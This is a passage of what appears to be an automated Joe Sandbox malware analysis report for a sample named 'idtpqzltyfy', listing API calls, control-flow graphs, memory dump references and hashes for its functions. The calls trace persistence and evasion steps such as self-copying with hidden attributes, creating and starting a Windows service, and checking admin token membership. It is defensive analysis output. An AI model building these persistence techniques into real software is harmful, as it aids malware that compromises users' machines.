                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(00000000,C:\Users\user,00000104), ref: 001483DA
                                                                                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 00148448
                                                                                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 001484DC
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 001484F7
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00148599
                                                                                                                                                                                                              • Part of subcall function 00155200: GetVersionExA.KERNEL32(001CAE70), ref: 001552CC
                                                                                                                                                                                                            • Sleep.KERNEL32(00000D05), ref: 00148B70
                                                                                                                                                                                                            • Sleep.KERNEL32(000007D0), ref: 00148DAC
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000200), ref: 00148E86
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000080), ref: 00148E9F
                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00148EC3
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000002), ref: 0014912B
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000080), ref: 00149186
                                                                                                                                                                                                            • GetCommandLineA.KERNEL32 ref: 00149265
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?), ref: 00149370
                                                                                                                                                                                                              • Part of subcall function 0014A4E0: lstrlen.KERNEL32(?), ref: 0014A4FE
                                                                                                                                                                                                              • Part of subcall function 0014D500: lstrlen.KERNEL32(?,?,0014D630,?), ref: 0014D523
                                                                                                                                                                                                            • MessageBoxA.USER32(00000000,00000004,00000005,?), ref: 001496D4
                                                                                                                                                                                                            • CloseHandle.KERNEL32(FFFFFFFF), ref: 00149AC8
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000080), ref: 00149AEC
                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00149B0C
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000002), ref: 00149B3B
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 00149C52
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 00148CB2
                                                                                                                                                                                                              • Part of subcall function 0014BBC0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0014BC90
                                                                                                                                                                                                              • Part of subcall function 0014BBC0: Process32First.KERNEL32(00000000,?), ref: 0014BCE3
                                                                                                                                                                                                            • GetCommandLineA.KERNEL32 ref: 001486AE
                                                                                                                                                                                                              • Part of subcall function 00142800: ExitProcess.KERNEL32 ref: 00142842
                                                                                                                                                                                                              • Part of subcall function 001708B0: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00170929
                                                                                                                                                                                                              • Part of subcall function 001708B0: __aulldiv.LIBCMT ref: 00170953
                                                                                                                                                                                                            • Sleep.KERNEL32(000007D0), ref: 00149E32
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(0018D800,00000080), ref: 00149E88
                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,0018D800,00000000), ref: 00149EA6
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(0018D800,00000002), ref: 00149EC5
                                                                                                                                                                                                              • Part of subcall function 00150500: OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 00150537
                                                                                                                                                                                                              • Part of subcall function 00150500: CreateServiceA.ADVAPI32(00000000,012532A8,012532A8,000F01FF,00000110,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00150596
                                                                                                                                                                                                              • Part of subcall function 00150500: ChangeServiceConfig2A.ADVAPI32(00000000,00000001,?), ref: 00150615
                                                                                                                                                                                                              • Part of subcall function 00150500: StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 0015062A
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000222A0,00000000,00000000,00000000), ref: 0014A26A
                                                                                                                                                                                                            • Sleep.KERNEL32(0000C350), ref: 0014A327
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$Attributes$CreateSleep$CopyMutexService$CommandLineModuleNameTimelstrlen$ChangeCloseConfig2CountEnvironmentExitFirstHandleManagerMessageOpenProcessProcess32SnapshotStartSystemThreadTickToolhelp32VariableVersion__aulldiv
                                                                                                                                                                                                            • String ID: zS$%Tmd$C:\Users\user$@L$}en
                                                                                                                                                                                                            • API String ID: 2964372999-4230071128
                                                                                                                                                                                                            • Opcode ID: afd3d6351805866d66c3ea40e9ff8472c26585f880d6c70bcffcadbdc90c277c
                                                                                                                                                                                                            • Instruction ID: e3293a6eb730aeb8f51adb720d26d57176b8f05384c9608a1d62fc2f8fe7eafc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: afd3d6351805866d66c3ea40e9ff8472c26585f880d6c70bcffcadbdc90c277c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F22358B1A00301DFD304EF64FC8AA663BB4FB98301B51461AE54697EB5EB708AE5CF51
                                                                                                                                                                                                            Function 00155200 Relevance: 30.9, APIs: 12, Strings: 5, Instructions: 1106fileCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 493 155200-15528c call 170a20 496 1552b2-155338 GetVersionExA call 14b7a0 call 14fbc0 493->496 497 15528e-1552ac 493->497 502 15533e-155397 call 14f0d0 496->502 503 155598-155602 496->503 497->496 509 155399-1553a5 502->509 510 1553ab-155405 502->510 504 155604-155626 503->504 505 15562d-1556d0 call 142f90 call 14d530 call 151bb0 call 14d670 call 14def0 call 151d90 503->505 504->505 535 1556d6-15575b DeleteFileA RemoveDirectoryA 505->535 536 15575d 505->536 509->510 512 155407-155419 510->512 513 15541f-155446 call 14c580 510->513 512->513 519 155496-1554b6 CreateDirectoryA call 142f90 513->519 520 155448-155482 513->520 525 1554bb-15554d call 14c580 call 151bb0 519->525 520->519 522 155484-155490 520->522 522->519 525->505 537 155553-155564 525->537 540 155760-1557c9 call 14f0d0 535->540 536->540 538 155575-155593 537->538 539 155566-155570 537->539 538->505 539->505 543 15580c-155883 call 14c580 CreateDirectoryA call 1413e0 540->543 544 1557cb-1557e0 540->544 551 155885-1558a3 543->551 552 1558ad-155915 call 14e430 CreateDirectoryA 543->552 545 155802 544->545 546 1557e2-155800 544->546 545->543 546->543 551->552 555 155917 552->555 556 155921-155964 call 142f90 552->556 555->556 559 155966-155975 556->559 560 15597b-1559af call 14c580 556->560 559->560 563 1559c5-1559d7 560->563 564 1559b1-1559c3 560->564 565 1559dd-155a35 call 142f90 call 151bb0 563->565 564->565 570 155a37-155a58 565->570 571 155a5a-155a67 565->571 572 155a6e-155a8b call 14d530 570->572 571->572 575 155aa2-155adc call 151bb0 call 14d670 call 14def0 call 151d90 572->575 576 155a8d-155a9b 572->576 585 1564f5-15650b 575->585 586 155ae2-155b01 575->586 576->575 589 15650d-156517 585->589 590 156519-156537 585->590 587 155b07-155b75 call 142f90 call 175820 586->587 588 155c42-155cec call 142f90 call 175820 call 151bb0 586->588 606 155b97-155bd0 call 151bb0 587->606 607 155b77-155b90 587->607 612 155d0e 588->612 613 155cee-155d0c 588->613 592 15653d-15657c call 14e430 SetFileAttributesA 589->592 590->592 602 15659c-1565ce call 16a7e0 call 14e310 592->602 603 15657e-156596 592->603 603->602 617 155bd2-155be4 606->617 618 155c1f-155c3d 606->618 607->606 616 155d10-155db5 call 14c580 CreateDirectoryA call 1413e0 612->616 613->616 624 155db7-155de6 616->624 625 155e1c-155e37 616->625 617->616 620 155bea-155c1a 617->620 618->616 620->616 626 155e08-155e1a 624->626 627 155de8-155e06 624->627 628 155e43-155ec2 call 14e430 CreateDirectoryA call 142f90 625->628 629 155e39 625->629 626->628 627->628 634 155ed4-155f12 call 14c580 628->634 635 155ec4-155ecf 628->635 629->628 638 155f14-155f2a 634->638 639 155f40-155fa0 call 142f90 call 151bb0 call 14d530 634->639 635->634 638->639 640 155f2c-155f39 638->640 647 155fc7-156007 call 151bb0 call 14d670 call 14def0 call 151d90 639->647 648 155fa2-155fbb 639->648 640->639 658 1564e1-1564ee 647->658 659 15600d-15606b GetTempPathA call 14d500 647->659 648->647 649 155fbd 648->649 649->647 658->585 662 156071-15607d 659->662 663 156169-1561ea call 1413e0 call 14e430 659->663 664 156092-15609a 662->664 665 15607f-15608c 662->665 678 1561f6-156217 CreateDirectoryA 663->678 679 1561ec 663->679 667 15609c-1560b4 664->667 668 1560da-1560fe 664->668 665->664 670 1560b6-1560c9 667->670 671 1560d0-1560d3 667->671 672 156100 668->672 673 15610a-15615d 668->673 670->671 671->662 675 1560d5 671->675 672->673 673->663 676 15615f 673->676 675->663 676->663 680 156219-156225 678->680 681 15622b-1562db call 142f90 call 14c580 call 142f90 678->681 679->678 680->681 688 1562dd-1562ee 681->688 689 1562fa-156342 call 151bb0 681->689 688->689 690 1562f0 688->690 693 156344-156351 689->693 694 156357-1563ba call 14d530 call 151bb0 call 14d670 call 14def0 call 151d90 689->694 690->689 693->694 705 1564a5-1564db 694->705 706 1563c0-156441 GetTempPathA call 1413e0 call 142f90 694->706 705->658 711 156455-15649e call 14c580 call 151bb0 706->711 712 156443-15644f 706->712 711->705 712->711
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetVersionExA.KERNEL32(001CAE70), ref: 001552CC
                                                                                                                                                                                                            • CreateDirectoryA.KERNELBASE(0000005C,00000000), ref: 0015549F
                                                                                                                                                                                                            • DeleteFileA.KERNELBASE(?), ref: 001556FE
                                                                                                                                                                                                            • RemoveDirectoryA.KERNELBASE(00000000), ref: 00155743
                                                                                                                                                                                                            • CreateDirectoryA.KERNELBASE(?,00000000), ref: 0015583A
                                                                                                                                                                                                            • CreateDirectoryA.KERNELBASE(?,00000000), ref: 001558F3
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 00155D71
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 00155E82
                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,?), ref: 00156029
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 001561FF
                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,?), ref: 001563DE
                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(?,00000002), ref: 0015655F
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Directory$Create$FilePathTemp$AttributesDeleteRemoveVersion
                                                                                                                                                                                                            • String ID: C:\Users\user$C:\whfkpbh\$\$aE'P$r9:
                                                                                                                                                                                                            • API String ID: 1691758827-1166413814
                                                                                                                                                                                                            • Opcode ID: 9bee97c4b9d065477c1dea236d010cf1b3e047ea12314249cbe35ff5e6a5ac55
                                                                                                                                                                                                            • Instruction ID: 1f69f77ae9c2a9888138bc1b0f7bbbd8c8c650dcf00358e654a38ae4449ba2f0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9bee97c4b9d065477c1dea236d010cf1b3e047ea12314249cbe35ff5e6a5ac55
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9FA26BB2A00205DFC704DF24FC96AA53BB5FBA4311B518219E94297EB5FB308AD5CF91
                                                                                                                                                                                                            Function 00151D90 Relevance: 4.7, APIs: 3, Instructions: 187fileCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 717 151d90-151e21 call 175df0 call 163110 722 151e23-151e4b call 16fcc0 717->722 723 151e4c-151e91 CreateFileA 717->723 725 151ed1-151ef0 723->725 726 151e93-151ed0 call 16fcc0 723->726 729 151ef2-151f06 725->729 730 151f0c-151f18 725->730 729->730 731 151f20-151f3e 730->731 733 151f40-151f57 731->733 734 151f59-151f85 731->734 735 151f8b-152063 call 14b620 call 16ff30 WriteFile 733->735 734->735 735->731 740 152069-15209c FindCloseChangeNotification call 16fcc0 735->740 742 1520a1-1520b6 740->742 743 1520c2-1520ca 742->743 744 1520b8 742->744 744->743
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 00163110: WaitForSingleObject.KERNEL32(?,00004E20,?,0014D0F2,00000108), ref: 001631AD
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00151E7B
                                                                                                                                                                                                              • Part of subcall function 0016FCC0: ReleaseMutex.KERNEL32(0014D410,?,0014D410,00000108), ref: 0016FCE9
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateFileMutexObjectReleaseSingleWait
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1564016613-0
                                                                                                                                                                                                            • Opcode ID: 22f5837e7a40c6c3ee3be3263d5944823e2568d89bb5d090c9fae3ee51ec13ed
                                                                                                                                                                                                            • Instruction ID: 4c38f319b3cbb9f489e097b241f6d020158641a4adba2a40a042d69e04128246
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 22f5837e7a40c6c3ee3be3263d5944823e2568d89bb5d090c9fae3ee51ec13ed
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D71F472611204DFC304DF64FC89A6A3BB9FB98315F418259E80697EB4DB709AE5CF81
                                                                                                                                                                                                            Function 0014B7A0 Relevance: 3.1, APIs: 2, Instructions: 89memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 745 14b7a0-14b84c AllocateAndInitializeSid 746 14b861-14b864 745->746 747 14b84e-14b85b 745->747 748 14b8ee-14b90e 746->748 749 14b86a-14b885 CheckTokenMembership 746->749 747->746 750 14b8b4-14b8e8 749->750 751 14b887-14b8ae 749->751 750->748 751->750
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0014B82B
                                                                                                                                                                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0014B87D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AllocateCheckInitializeMembershipToken
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1663163955-0
                                                                                                                                                                                                            • Opcode ID: 1e434bf8c9f31915622607fa10d4e0e72f03e96b0633d08eb81183e79bc3b665
                                                                                                                                                                                                            • Instruction ID: 837e2b70412a640a764e1ba25bcebfe3eee488d6fa528ad107c108dc0005887f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1e434bf8c9f31915622607fa10d4e0e72f03e96b0633d08eb81183e79bc3b665
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 07319E75905248EFD704CFA8FDD99BA7BB8FB58304B01819AE40297AB0D7709AD4CB51
                                                                                                                                                                                                            Function 00152EB0 Relevance: 3.0, APIs: 2, Instructions: 40memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 753 152eb0-152ef9 GetProcessHeap RtlFreeHeap 754 152f30-152f42 753->754 755 152efb-152f07 753->755 758 152f44-152f50 754->758 759 152f56-152f57 754->759 756 152f09-152f19 755->756 757 152f1a-152f2f 755->757 758->759
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00150367,?,00150367,00000000), ref: 00152ED1
                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000000,?,00150367,00000000), ref: 00152ED8
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$FreeProcess
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3859560861-0
                                                                                                                                                                                                            • Opcode ID: 59c7adb539fa9924a3090a7480335d9ad5942488817bfa6c414050d21aedd6ee
                                                                                                                                                                                                            • Instruction ID: f30e63a88a2a06e5d576f11d18279de1a55d9d7526c50d3dd3a750582e1e580e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 59c7adb539fa9924a3090a7480335d9ad5942488817bfa6c414050d21aedd6ee
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1301DF31608245CBC318DFA4FE668293BF9F7487207144206F51A8BEB0D330D8E98B15
                                                                                                                                                                                                            Function 0014E2C0 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 760 14e2c0-14e2e2 761 14e2e4-14e2ec 760->761 762 14e2f2-14e306 GetProcessHeap RtlAllocateHeap 760->762 761->762
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,0017220A,02167FFC,?,?,?,?,0016463C), ref: 0014E2F8
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,0017220A,02167FFC,?,?,?,?,0016463C), ref: 0014E2FF
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocateProcess
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1357844191-0
                                                                                                                                                                                                            • Opcode ID: 8416483f14de977ede38d531b499846a59f5f9a06fabc187798644c3ca993560
                                                                                                                                                                                                            • Instruction ID: baadc4dfb9003755db613a08ab54eecf014547e236bae513d1af665befb331d9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8416483f14de977ede38d531b499846a59f5f9a06fabc187798644c3ca993560
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B4E08C76104200AFC7089FA9FC8DA5633B8FB09305F144518FA0DC6AB2CB71E6C18B91
                                                                                                                                                                                                            Function 00163CF0 Relevance: 1.6, APIs: 1, Instructions: 120fileCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 763 163cf0-163d33 764 163d35-163d3f 763->764 765 163d41-163d51 763->765 766 163d58-163e30 call 14e430 call 142f90 call 14c580 call 151bb0 CreateFileA 764->766 765->766 775 163e32-163e51 766->775 776 163e53-163e64 766->776 777 163e8a-163e9d 775->777 778 163e66 776->778 779 163e70-163e84 776->779 780 163ec2-163eca 777->780 781 163e9f-163ec0 777->781 778->779 779->777 782 163ed0-163ef7 call 16a7e0 780->782 781->782
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 00163E0B
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                            • Opcode ID: e71c06b8d01da2d9b1fa5f9489f71a6a325f1027e8d1682d195e916b76a1f532
                                                                                                                                                                                                            • Instruction ID: 5397fee7e2b920637bbddda1b32943dd6f83130f7f52fca8c039dd05e7acc12c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e71c06b8d01da2d9b1fa5f9489f71a6a325f1027e8d1682d195e916b76a1f532
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E412372A10314DBD314AF20FC82BA13BB1F7A4710F524219E651E6DB5FB709AE1CB91
                                                                                                                                                                                                            Function 001645A9 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

